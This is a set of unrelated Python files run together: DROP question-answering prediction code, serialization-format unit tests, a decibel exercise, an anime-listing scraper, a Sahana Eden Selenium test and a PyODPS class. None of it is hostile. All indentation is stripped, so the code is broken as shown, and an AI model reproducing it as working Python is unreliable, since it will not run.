add_sub_expressions.append(add_sub_expression[:len(number_indices)])
# Weakly-supervised for counting
for count in example.counts:
input_counts.append(count)
# Weeakly-supervised for negation
if example.negations != []:
for negation in example.negations:
if sum(negation[:len(number_indices)]) == 1:
assert len(negation[:len(number_indices)]) == len(number_indices)
negations.append(negation[:len(number_indices)])
is_impossible = True
if "span_extraction" in answering_abilities and start_indices != [] and end_indices != []:
is_impossible = False
assert example.number_of_answer is not None
number_of_answers.append(example.number_of_answer - 1)
if "negation" in answering_abilities and negations != []:
is_impossible = False
if "addition_subtraction" in answering_abilities and add_sub_expressions != []:
is_impossible = False
if "counting" in answering_abilities and input_counts != []:
is_impossible = False
if start_indices == [] and end_indices == [] and number_of_answers == []:
start_indices.append(-1)
end_indices.append(-1)
number_of_answers.append(-1)
if negations == []:
negations.append([-1] * len(number_indices))
if add_sub_expressions == []:
add_sub_expressions.append([-1] * len(number_indices))
if input_counts == []:
input_counts.append(-1)
if not is_impossible:
features.append(InputFeatures(
unique_id=unique_id,
example_index=example_index,
tokens=tokens,
que_token_to_orig_map=que_token_to_orig_map,
doc_token_to_orig_map=doc_token_to_orig_map,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
number_indices=number_indices,
start_indices=start_indices,
end_indices=end_indices,
number_of_answers=number_of_answers,
add_sub_expressions=add_sub_expressions,
input_counts=input_counts,
negations=negations))
unique_id += 1
else:
skip_count += 1
else:
features.append(InputFeatures(
unique_id=unique_id,
example_index=example_index,
tokens=tokens,
que_token_to_orig_map=que_token_to_orig_map,
doc_token_to_orig_map=doc_token_to_orig_map,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
number_indices=number_indices))
unique_id += 1
if len(features) % 5000 == 0:
logger.info("Processing features: %d" % (len(features)))
logger.info(f"Skipped {skip_count} features, truncated {truncate_count} features, kept {len(features)} features.")
return features
def wrapped_get_final_text(example, feature, start_index, end_index, do_lower_case, verbose_logging, logger):
if start_index in feature.doc_token_to_orig_map and end_index in feature.doc_token_to_orig_map:
orig_doc_start = feature.doc_token_to_orig_map[start_index]
orig_doc_end = feature.doc_token_to_orig_map[end_index]
orig_tokens = example.passage_tokens[orig_doc_start:(orig_doc_end + 1)]
elif start_index in feature.que_token_to_orig_map and end_index in feature.que_token_to_orig_map:
orig_que_start = feature.que_token_to_orig_map[start_index]
orig_que_end = feature.que_token_to_orig_map[end_index]
orig_tokens = example.question_tokens[orig_que_start:(orig_que_end + 1)]
else:
return None
tok_tokens = feature.tokens[start_index:(end_index + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case, verbose_logging, logger)
return final_text
def add_sub_beam_search(example, feature, result, is_training, beam_size, max_count):
number_sign_logits = result['number_sign_logits'] # [L, 3]
number_mask = result['number_mask'] # [L]
number_indices_list, sign_indices_list, scores_list = beam_search(number_sign_logits, number_mask, beam_size, max_count)
number_sign_labels = []
if is_training:
if number_indices_list != [] and sign_indices_list != []:
for number_indices, sign_indices in zip(number_indices_list, sign_indices_list):
pred_answer = sum([example.numbers_in_passage[number_index] * sign_remap[sign_index]
for number_index, sign_index in zip(number_indices, sign_indices)])
pred_answer = float(Decimal(pred_answer).quantize(Decimal('0.0000')))
ground_truth_answer_strings = [answer_json_to_strings(annotation)[0] for annotation in
example.answer_annotations]
exact_match, _ = metric_max_over_ground_truths(
drop_em_and_f1, str(pred_answer), ground_truth_answer_strings)
number_sign_labels.append(exact_match)
# Pad to fixed length
for number_indices, sign_indices in zip(number_indices_list, sign_indices_list):
while len(number_indices) < max_count:
number_indices.append(-1)
sign_indices.append(-1)
while len(number_indices_list) < beam_size:
number_indices_list.append([-1] * max_count)
sign_indices_list.append([-1] * max_count)
scores_list.append(0)
if is_training:
number_sign_labels.append(0)
# Add ground truth expressions if there is no positive label
if is_training and max(number_sign_labels) == 0:
gold_number_indices, gold_sign_indices = [], []
add_sub_expression = choice(feature.add_sub_expressions)
for number_index, sign_index in enumerate(add_sub_expression):
if sign_index > 0 and number_mask[number_index]:
gold_number_indices.append(number_index)
gold_sign_indices.append(sign_index)
while len(gold_number_indices) < max_count:
gold_number_indices.append(-1)
gold_sign_indices.append(-1)
number_indices_list[-1] = gold_number_indices
sign_indices_list[-1] = gold_sign_indices
number_sign_labels[-1] = 1
return number_indices_list, sign_indices_list, number_sign_labels, scores_list
def batch_annotate_candidates(all_examples, batch_features, batch_results, answering_abilities,
is_training, beam_size, max_count):
"""Annotate top-k candidate answers into features."""
unique_id_to_result = {}
for result in batch_results:
unique_id_to_result[result['unique_id']] = result
batch_number_indices, batch_sign_indices, batch_sign_labels, batch_scores = [], [], [], []
for (feature_index, feature) in enumerate(batch_features):
example = all_examples[feature.example_index]
result = unique_id_to_result[feature.unique_id]
number_indices, sign_indices, sign_labels, scores = None, None, None, None
if is_training:
if feature.add_sub_expressions != [[-1] * len(feature.number_indices)]:
number_indices, sign_indices, sign_labels, scores = add_sub_beam_search(example, feature, result,
is_training, beam_size, max_count)
else:
predicted_ability = result['predicted_ability']
predicted_ability_str = answering_abilities[predicted_ability]
if predicted_ability_str == "addition_subtraction":
number_indices, sign_indices, sign_labels, scores = add_sub_beam_search(example, feature, result,
is_training, beam_size, max_count)
if number_indices is None and sign_indices is None and sign_labels is None and scores is None:
number_indices, sign_indices, sign_labels, scores = [], [], [], []
while len(number_indices) < beam_size:
number_indices.append([-1] * max_count)
sign_indices.append([-1] * max_count)
sign_labels.append(0)
scores.append(0)
batch_number_indices.append(number_indices)
batch_sign_indices.append(sign_indices)
batch_sign_labels.append(sign_labels)
batch_scores.append(scores)
return batch_number_indices, batch_sign_indices, batch_sign_labels, batch_scores
def write_predictions(all_examples, all_features, all_results, answering_abilities, drop_metrics, length_heuristic,
n_best_size, max_answer_length, do_lower_case, verbose_logging, logger):
"""Write final predictions to the json file."""
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result['unique_id']] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["start_index", "end_index", "start_logit", "end_logit", "rerank_logit", "heuristic_logit"])
all_nbest_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
assert len(features) == 1
feature = features[0]
result = unique_id_to_result[feature.unique_id]
predicted_ability = result['predicted_ability']
predicted_ability_str = answering_abilities[predicted_ability]
nbest_json, predicted_answers = [], []
if predicted_ability_str == "addition_subtraction":
max_prob, best_answer = 0, None
sign_rerank_probs = _compute_softmax(result['sign_rerank_logits'])
for number_indices, sign_indices, rerank_prob, prob in zip(result['number_indices2'], result['sign_indices'], sign_rerank_probs, result['sign_probs']):
pred_answer = sum([sign_remap[sign_index] * example.numbers_in_passage[number_index] for sign_index, number_index in zip(sign_indices, number_indices) if sign_index != -1 and number_index != -1])
pred_answer = str(float(Decimal(pred_answer).quantize(Decimal('0.0000'))))
if rerank_prob*prob > max_prob:
max_prob = rerank_prob*prob
best_answer = pred_answer
assert best_answer is not None
predicted_answers.append(best_answer)
output = collections.OrderedDict()
output["text"] = str(best_answer)
output["type"] = "addition_subtraction"
nbest_json.append(output)
elif predicted_ability_str == "counting":
predicted_answers.append(str(result['predicted_count']))
output = collections.OrderedDict()
output["text"] = str(result['predicted_count'])
output["type"] = "counting"
nbest_json.append(output)
elif predicted_ability_str == "negation":
index = np.argmax(result['predicted_negations'])
pred_answer = 100 - example.numbers_in_passage[index]
pred_answer = float(Decimal(pred_answer).quantize(Decimal('0.0000')))
predicted_answers.append(str(pred_answer))
output = collections.OrderedDict()
output["text"] = str(pred_answer)
output["type"] = "negation"
nbest_json.append(output)
elif predicted_ability_str == "span_extraction":
number_of_spans = result['predicted_spans']
prelim_predictions = []
start_indexes = _get_best_indexes(result['start_logits'], n_best_size)
end_indexes = _get_best_indexes(result['end_logits'], n_best_size)
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.que_token_to_orig_map and start_index not in feature.doc_token_to_orig_map:
continue
if end_index not in feature.que_token_to_orig_map and start_index not in feature.doc_token_to_orig_map:
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
start_logit = result['start_logits'][start_index]
end_logit = result['end_logits'][end_index]
heuristic_logit = start_logit + end_logit \
- length_heuristic * (end_index - start_index + 1)
prelim_predictions.append(
_PrelimPrediction(
start_index=start_index,
end_index=end_index,
start_logit=start_logit,
end_logit=end_logit,
rerank_logit=0,
heuristic_logit=heuristic_logit))
prelim_predictions = sorted(prelim_predictions, key=lambda x: (x.heuristic_logit), reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit", "start_index", "end_index", "rerank_logit", "heuristic_logit"])
seen_predictions = {}
nbest = []
for i, pred_i in enumerate(prelim_predictions):
if len(nbest) >= n_best_size:
break
final_text = wrapped_get_final_text(example, feature, pred_i.start_index, pred_i.end_index,
do_lower_case, verbose_logging, logger)
if final_text in seen_predictions or final_text is None:
continue
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred_i.start_logit,
end_logit=pred_i.end_logit,
start_index=pred_i.start_index,
end_index=pred_i.end_index,
rerank_logit=pred_i.rerank_logit,
heuristic_logit=pred_i.heuristic_logit
))
# filter out redundant candidates
if (i + 1) < len(prelim_predictions):
indexes = []
for j, pred_j in enumerate(prelim_predictions[(i + 1):]):
filter_text = wrapped_get_final_text(example, feature, pred_j.start_index, pred_j.end_index,
do_lower_case, verbose_logging, logger)
if filter_text is None:
indexes.append(i + j + 1)
else:
if calculate_f1(final_text, filter_text) > 0:
indexes.append(i + j + 1)
[prelim_predictions.pop(index - k) for k, index in enumerate(indexes)]
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0, start_index=0.0, end_index=0.0,
rerank_logit=0., heuristic_logit=0.))
assert len(nbest) >= 1
for i, entry in enumerate(nbest):
if i > number_of_spans:
break
predicted_answers.append(entry.text)
output = collections.OrderedDict()
output["text"] = entry.text
output["type"] = "span_extraction"
nbest_json.append(output)
else:
raise ValueError(f"Unsupported answer ability: {predicted_ability_str}")
assert len(nbest_json) >= 1 and len(predicted_answers) >= 1
if example.answer_annotations:
drop_metrics(predicted_answers, example.answer_annotations)
ground_truth_answer_strings = [answer_json_to_strings(annotation)[0]
for annotation in example.answer_annotations]
em, f1 = metric_max_over_ground_truths(drop_em_and_f1, predicted_answers, ground_truth_answer_strings)
for output in nbest_json:
output["f1"] = f1
output["em"] = em
all_nbest_json[example.qas_id] = nbest_json
exact_match, f1_score = drop_metrics.get_metric(reset=True)
return all_nbest_json, {'em': exact_match, 'f1': f1_score}
class ListBatcher(object):
def get_epoch(self, data: List):
raise NotImplementedError()
def get_batch_size(self):
""" Return the batch size """
raise NotImplementedError()
def epoch_size(self, n_elements):
raise NotImplementedError()
class ExampleLenKey(object):
def __call__(self, d: DropExample):
return len(d.passage_tokens) + len(d.question_tokens)
class FeatureLenKey(object):
def __call__(self, d: InputFeatures):
return len(d.input_ids)
class ClusteredBatcher(ListBatcher):
def __init__(self,
batch_size: int,
clustering: Callable,
truncate_batches=False):
self.batch_size = batch_size
self.clustering = clustering
self.truncate_batches = truncate_batches
def get_batch_size(self):
return self.batch_size
def get_epoch(self, data: List):
data = sorted(data, key=self.clustering)
n_batches = len(data) // self.batch_size
intervals = [(i * self.batch_size, (i + 1) * self.batch_size) for i in range(0, n_batches)]
remainder = len(data) % self.batch_size
if self.truncate_batches and remainder > 0:
intervals.append((len(data) - remainder, len(data)))
np.random.shuffle(intervals)
for i, j in intervals:
yield data[i:j]
def epoch_size(self, n_elements):
size = n_elements // self.batch_size
if self.truncate_batches and (n_elements % self.batch_size) > 0:
size += 1
return size
class FixedOrderBatcher(ListBatcher):
def __init__(self, batch_size: int, truncate_batches=False):
self.batch_size = batch_size
self.truncate_batches = truncate_batches
def get_batch_size(self):
return self.batch_size
def get_epoch(self, data: List):
n_batches = len(data) // self.batch_size
for i in range(n_batches):
yield data[i*self.batch_size:(i + 1)*self.batch_size]
if self.truncate_batches and (len(data) % self.batch_size) > 0:
yield data[self.batch_size * (len(data) // self.batch_size):]
def epoch_size(self, n_elements):
size = n_elements // self.batch_size
if self.truncate_batches and (n_elements % self.batch_size) > 0:
size += 1
return size
def get_tensors_list(batch, is_train, gra_acc_steps, max_seq_length):
input_len = np.array([len(feature.input_ids) for feature in batch], dtype='int32')
max_input_len = input_len.max()
mini_batch_size = int(len(batch) / gra_acc_steps)
batchs_list, tensors_list = [], []
if max_input_len > max_seq_length / gra_acc_steps and mini_batch_size > 0:
mini_batching = ClusteredBatcher(mini_batch_size, FeatureLenKey(), truncate_batches=True)
for mini_batch in mini_batching.get_epoch(batch):
tensors_list.append(get_tensors(mini_batch, is_train))
batchs_list.append(mini_batch)
else:
tensors_list.append(get_tensors(batch, is_train))
batchs_list.append(batch)
return batchs_list, tensors_list
def get_tensors(batch, is_train):
input_len = np.array([len(feature.input_ids) for feature in batch], dtype='int32')
max_input_len = input_len.max()
number_indices_len = np.array([len(feature.number_indices) for feature in batch], dtype='int32')
max_number_indices_len = number_indices_len.max()
if is_train:
start_indices_len = np.array([len(feature.start_indices) for feature in batch], dtype='int32')
max_start_indices_len = start_indices_len.max()
input_counts_len = np.array([len(feature.input_counts) for feature in batch], dtype='int32')
max_input_counts_len = input_counts_len.max()
number_of_answers_len = np.array([len(feature.number_of_answers) for feature in batch], dtype='int32')
max_number_of_answers_len = number_of_answers_len.max()
add_sub_combination_len, negation_combination_len = [], []
for feature in batch:
add_sub_combination_len.append(len(feature.add_sub_expressions))
negation_combination_len.append(len(feature.negations))
max_add_sub_combination_len = np.array(add_sub_combination_len).max()
max_negation_combination_len = np.array(negation_combination_len).max()
input_ids_list, input_mask_list, segment_ids_list, number_indices_list = [], [], [], []
if is_train:
start_indices_list, end_indices_list, number_of_answers_list, input_counts_list, add_sub_expressions_list, \
negations_list = [], [], [], [], [], []
for feature in batch:
input_ids = copy.deepcopy(feature.input_ids)
input_mask = copy.deepcopy(feature.input_mask)
segment_ids = copy.deepcopy(feature.segment_ids)
# Zero-pad up to the max mini-batch sequence length.
while len(input_ids) < max_input_len:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
input_ids_list.append(input_ids)
input_mask_list.append(input_mask)
segment_ids_list.append(segment_ids)
number_indices = copy.deepcopy(feature.number_indices)
while len(number_indices) < max_number_indices_len:
number_indices.append(-1)
number_indices_list.append(number_indices)
if is_train:
start_indices = copy.deepcopy(feature.start_indices)
end_indices = copy.deepcopy(feature.end_indices)
number_of_answers = copy.deepcopy(feature.number_of_answers)
input_counts = copy.deepcopy(feature.input_counts)
add_sub_expressions = copy.deepcopy(feature.add_sub_expressions)
negations = copy.deepcopy(feature.negations)
while len(start_indices) < max_start_indices_len:
start_indices.append(-1)
end_indices.append(-1)
while len(input_counts) < max_input_counts_len:
input_counts.append(-1)
while len(number_of_answers) < max_number_of_answers_len:
number_of_answers.append(-1)
new_add_sub_expressions = []
for add_sub_expression in add_sub_expressions:
while len(add_sub_expression) < max_number_indices_len:
add_sub_expression.append(-1)
new_add_sub_expressions.append(add_sub_expression)
while len(new_add_sub_expressions) < max_add_sub_combination_len:
new_add_sub_expressions.append([-1] * max_number_indices_len)
new_negations = []
for negation in negations:
while len(negation) < max_number_indices_len:
negation.append(-1)
new_negations.append(negation)
while len(new_negations) < max_negation_combination_len:
new_negations.append([-1] * max_number_indices_len)
start_indices_list.append(start_indices)
end_indices_list.append(end_indices)
number_of_answers_list.append(number_of_answers)
input_counts_list.append(input_counts)
add_sub_expressions_list.append(new_add_sub_expressions)
negations_list.append(new_negations)
batch_input_ids = torch.tensor(input_ids_list, dtype=torch.long)
batch_input_mask = torch.tensor(input_mask_list, dtype=torch.long)
batch_segment_ids = torch.tensor(segment_ids_list, dtype=torch.long)
batch_number_indices = torch.tensor(number_indices_list, dtype=torch.long)
if is_train:
batch_start_indices = torch.tensor(start_indices_list, dtype=torch.long)
batch_end_indices = torch.tensor(end_indices_list, dtype=torch.long)
batch_number_of_answers = torch.tensor(number_of_answers_list, dtype=torch.long)
batch_input_counts = torch.tensor(input_counts_list, dtype=torch.long)
batch_add_sub_expressions = torch.tensor(add_sub_expressions_list, dtype=torch.long)
batch_negations = torch.tensor(negations_list, dtype=torch.long)
return batch_input_ids, batch_input_mask, batch_segment_ids, batch_number_indices, batch_start_indices, \
batch_end_indices, batch_number_of_answers, batch_input_counts, batch_add_sub_expressions, batch_negations
else:
return batch_input_ids, batch_input_mask, batch_segment_ids, batch_number_indices
|
from datetime import date, datetime, time
from unittest2 import TestCase
from urllib import unquote
from scheme.formats import *
class TestStructuredText(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(StructuredText.serialize(unserialized), serialized)
self.assertEqual(StructuredText.unserialize(serialized), unserialized)
def test_booleans(self):
self.assert_correct([
(True, 'true'),
(False, 'false'),
])
self.assertEqual(StructuredText.unserialize('True'), True)
self.assertEqual(StructuredText.unserialize('False'), False)
def test_mappings(self):
self.assert_correct([
({}, '{}'),
({'b': '1'}, '{b:1}'),
({'b': '1', 'c': '2'}, '{b:1,c:2}'),
({'b': True}, '{b:true}'),
({'b': 'a:b'}, '{b:a:b}'),
])
def test_sequences(self):
self.assert_correct([
([], '[]'),
(['1'], '[1]'),
(['1', '2'], '[1,2]'),
([True, False], '[true,false]'),
])
def test_nested_structures(self):
self.assert_correct([
({'b': {}}, '{b:{}}'),
(['1', '2', ['3', []]], '[1,2,[3,[]]]'),
([True, {'b': [False, '1']}], '[true,{b:[false,1]}]'),
])
def test_parsing_numbers(self):
self.assertEqual(StructuredText.unserialize('1', True), 1)
self.assertEqual(StructuredText.unserialize('{b:1.2}', True), {'b': 1.2})
def test_parsing_escape_characters(self):
self.assert_correct([
('{', '\{'),
('}', '\}'),
('{}', '\{\}'),
('{a}', '\{a\}'),
])
self.assert_correct([
('[', '\['),
(']', '\]'),
('[]', '\[\]'),
('[a]', '\[a\]'),
])
self.assert_correct([
({'b': '{}'}, '{b:\{\}}'),
({'b': '[]'}, '{b:\[\]}'),
({'a': '[]', 'b': '{}', 'c': '1', 'd': [], 'e': {}}, '{a:\[\],b:\{\},c:1,d:[],e:{}}'),
])
self.assert_correct([
(['{}'], '[\{\}]'),
(['[]'], '[\[\]]'),
(['{}', '[]', 'b', [], {}], '[\{\},\[\],b,[],{}]'),
])
self.assert_correct([
(r'\\', r'\\'),
(r'\\b', r'\\b'),
])
SINGLE_DICT = """a: 1
b: true
c: something"""
DICT_WITHIN_DICT = """a:
b: 1
c: true
d:
e: 2
f: false"""
SINGLE_LIST = """- 1
- 2
- 3"""
LIST_WITHIN_LIST = """- - 1
- 2
- - 3
- 4"""
DICT_WITHIN_LIST = """- a: 1
b: true
- a: 2
b: false"""
LIST_WITHIN_DICT = """a:
- 1
- 2
b:
- 3
- 4"""
class TestYaml(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(Yaml.serialize(unserialized), serialized)
self.assertEqual(Yaml.unserialize(serialized), unserialized)
def assert_serializes(self, unserialized, serialized):
self.assertEqual(Yaml.serialize(unserialized), serialized)
def _test_simple_values(self):
self.assert_correct([
(None, 'null'),
(True, 'true'),
(False, 'false'),
(1, '1'),
(1.0, '1.0'),
(date(2000, 1, 1), '2000-01-01'),
(datetime(2000, 1, 1, 0, 0, 0), '2000-01-01 00:00:00'),
])
def _test_required_quotes(self):
self.assert_correct([
('', "''"),
('null', "'null'"),
('Null', "'Null'"),
('NULL', "'NULL'"),
('~', "'~'"),
('true', "'true'"),
('True', "'True'"),
('TRUE', "'TRUE'"),
('false', "'false'"),
('False', "'False'"),
('FALSE', "'FALSE'"),
])
def _test_empty_values(self):
self.assert_correct([
({}, '{}'),
([], '[]'),
])
self.assert_serializes(set(), '[]')
self.assert_serializes((), '[]')
def _test_complex_values(self):
self.assert_correct([
({'a': 1, 'b': True, 'c': 'something'}, SINGLE_DICT),
({'a': {'b': 1, 'c': True}, 'd': {'e': 2, 'f': False}}, DICT_WITHIN_DICT),
([1, 2, 3], SINGLE_LIST),
([[1, 2], [3, 4]], LIST_WITHIN_LIST),
([{'a': 1, 'b': True}, {'a': 2, 'b': False}], DICT_WITHIN_LIST),
({'a': [1, 2], 'b': [3, 4]}, LIST_WITHIN_DICT),
])
self.assert_serializes((1, 2, 3), SINGLE_LIST)
class TestUrlEncoded(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(unquote(UrlEncoded.serialize(unserialized)), serialized)
self.assertEqual(UrlEncoded.unserialize(serialized), unserialized)
def test_invalid_data(self):
self.assertRaises(ValueError, lambda: UrlEncoded.serialize(True))
self.assertRaises(ValueError, lambda: UrlEncoded.unserialize(True))
def test_booleans(self):
self.assert_correct([
({'a': True}, 'a=true'),
({'a': False}, 'a=false'),
])
def test_mappings(self):
self.assert_correct([
({'a': {}}, 'a={}'),
({'a': {'b': '1'}}, 'a={b:1}'),
({'a': {'b': '1', 'c': '2'}}, 'a={b:1,c:2}'),
({'a': {'b': True}}, 'a={b:true}'),
])
def test_sequences(self):
self.assert_correct([
({'a': []}, 'a=[]'),
({'a': ['1']}, 'a=[1]'),
({'a': ['1', '2']}, 'a=[1,2]'),
({'a': [True]}, 'a=[true]'),
])
def test_nested_structures(self):
self.assert_correct([
({'a': {'b': {}}}, 'a={b:{}}'),
({'a': ['1', '2', ['3', []]]}, 'a=[1,2,[3,[]]]'),
({'a': [True, {'b': [False, '1']}]}, 'a=[true,{b:[false,1]}]'),
])
def test_escaped_characters(self):
self.assert_correct([
({'a': {'b': '{}'}}, 'a={b:\{\}}'),
({'a': '{b:c}'}, 'a=\{b:c\}'),
({'a': ['1', '2', ['3', '[]']]}, 'a=[1,2,[3,\[\]]]'),
({'a': ['1', '2', '[', '4']}, 'a=[1,2,\[,4]'),
({'a': ['{}', {}, '[]', []]}, 'a=[\{\},{},\[\],[]]'),
])
class TestXml(TestCase):
def assert_correct(self, pairs):
for unserialized, serialized in pairs:
self.assertEqual(Xml.serialize(unserialized, preamble=False), serialized)
self.assertEqual(Xml.unserialize(serialized), unserialized)
def assert_serializes(self, unserialized, serialized):
self.assertEqual(Xml.serialize(unserialized, preamble=False), serialized)
def test_simple_values(self):
self.assert_correct([
(None, '<root>null</root>'),
(True, '<root>true</root>'),
(False, '<root>false</root>'),
(1, '<root>1</root>'),
(1.0, '<root>1.0</root>'),
('testing', '<root>testing</root>'),
('', '<root />'),
])
def test_empty_values(self):
self.assert_correct([
({}, '<root type="struct" />'),
([], '<root type="list" />'),
])
self.assert_serializes(set(), '<root type="list" />')
self.assert_serializes((), '<root type="list" />')
def test_complex_values(self):
self.assert_correct([
({'a': 1, 'b': True, 'c': 'something'}, '<root><a>1</a><b>true</b><c>something</c></root>'),
({'a': {'b': 1, 'c': True}, 'd': {'e': 2, 'f': False}},
'<root><a><b>1</b><c>true</c></a><d><e>2</e><f>false</f></d></root>'),
([1, 2, 3], '<root><_>1</_><_>2</_><_>3</_></root>'),
([[1, 2], [3, 4]], '<root><_><_>1</_><_>2</_></_><_><_>3</_><_>4</_></_></root>'),
([{'a': 1, 'b': True}, {'a': 2, 'b': False}],
'<root><_><a>1</a><b>true</b></_><_><a>2</a><b>false</b></_></root>'),
({'a': [1, 2], 'b': [3, 4]}, '<root><a><_>1</_><_>2</_></a><b><_>3</_><_>4</_></b></root>'),
])
self.assert_serializes((1, 2, 3), '<root><_>1</_><_>2</_><_>3</_></root>')
|
#39 Sound Levels
#Asking the decibel level of Noise
x = float(input("Enter the decibel level of noise = "))
if x == 130:
print("Jackhammer.")
elif x == 106:
print("Gas lawnmower.")
elif x == 70:
print("Alarm clock.")
elif x <= 40 :
print("Quiet room.")
elif 130 > x > 106:
print("Jackhammer or gas lawnmower.")
elif 106 > x > 70:
print("Gas lawnmower or alarm clock.")
elif 70 > x > 40:
print("Alarm clock or quiet room.")
elif x > 130:
print("Jackhammer")
|
# Copyright © 2021 TerminalWarlord
# Encoding = 'utf-8'
# Licensed under MIT License
# https://github.com/TerminalWarlord/
import requests
from bs4 import BeautifulSoup as bs
def latestepisodes():
r = requests.get('https://ajax.gogo-load.com/ajax/page-recent-release.html?page=1&type=1')
soup = bs(r.text, "html.parser")
animes = soup.find("ul", {"class": "items"}).find_all("li")
animesjson = []
for anime in animes:
item = {
'title' : anime.find("p", {"class": "name"}).find("a").text.strip() + " " + anime.find("p", {"class": "episode"}).text.strip(),
'image' : anime.find("div", {"class": "img"}).find("img").attrs['src'],
'url' : "https://gogoanime.pe" + anime.find("div", {"class": "img"}).find("a").attrs['href']
}
animesjson.append(item)
s = requests.get('https://ajax.gogo-load.com/ajax/page-recent-release.html?page=1&type=2')
soup = bs(s.text, "html.parser")
animes = soup.find("ul", {"class": "items"}).find_all("li")
for anime in animes:
item = {
'title' : anime.find("p", {"class": "name"}).find("a").text.strip() + " " + anime.find("p", {"class": "episode"}).text.strip(),
'image' : anime.find("div", {"class": "img"}).find("img").attrs['src'],
'url' : "https://gogoanime.pe" + anime.find("div", {"class": "img"}).find("a").attrs['href']
}
animesjson.append(item)
t = requests.get('https://ajax.gogo-load.com/ajax/page-recent-release.html?page=1&type=3')
soup = bs(t.text, "html.parser")
animes = soup.find("ul", {"class": "items"}).find_all("li")
for anime in animes:
item = {
'title' : anime.find("p", {"class": "name"}).find("a").text.strip() + " " + anime.find("p", {"class": "episode"}).text.strip(),
'image' : anime.find("div", {"class": "img"}).find("img").attrs['src'],
'url' : "https://gogoanime.pe" + anime.find("div", {"class": "img"}).find("a").attrs['href']
}
animesjson.append(item)
return animesjson
|
""" Sahana Eden Module Automated Tests - HRM006 Add Staff To Office
@copyright: 2011-2012 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
from tests.web2unittest import SeleniumUnitTest
from tests import *
#import unittest, re, time
class AddStaffToOffice(SeleniumUnitTest):
def test_hrm006_add_staff_to_office(self):
"""
@case: HRM006
@description: Add a premade made staff to an Office
@TestDoc: https://docs.google.com/spreadsheet/ccc?key=0AmB3hMcgB-3idG1XNGhhRG9QWF81dUlKLXpJaFlCMFE
@Test Wiki: http://eden.sahanafoundation.org/wiki/DeveloperGuidelines/Testing
"""
browser = self.browser
config = self.config
self.login(account="admin", nexturl="org/office")
self.dt_filter("AP Zone")
self.dt_action()
url = browser.current_url
url_parts = url.split("/")
try:
org_id = int(url_parts[-2])
except:
org_id = int(url_parts[-1])
browser.get("%s/org/office/%s/human_resource" % (config.url, org_id))
self.browser.find_element_by_id("show-add-btn").click()
self.browser.find_element_by_id("select_from_registry").click()
self.create("hrm_human_resource",
[
( "person_id",
"Beatriz de Carvalho",
"autocomplete")
]
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from .core import LazyLoad
from .. import serializers, utils
class XFlow(LazyLoad):
__slots__ = 'xml_source',
name = serializers.XMLNodeField('Name')
owner = serializers.XMLNodeField('Owner')
creation_time = serializers.XMLNodeField('CreationTime',
parse_callback=utils.parse_rfc822)
last_modified_time = serializers.XMLNodeField('LastModifiedTime',
parse_callback=utils.parse_rfc822)
def reload(self):
url = self.resource()
resp = self._client.get(url)
self.xml_source = resp.content
self.owner = resp.headers.get('x-odps-owner')
self.creation_time = utils.parse_rfc822(resp.headers.get('x-odps-creation-time'))
self.last_modified_time = utils.parse_rfc822(resp.headers.get('Last-Modified'))
def update(self):
return self._parent.update(self)
def drop(self):
return self._parent.delete(self) |
### sgfparser.py parses .sgf files. Each parse takes a file and creates a list
### of ParsedNodes. The list of nodes may not adhere to normal game moves such
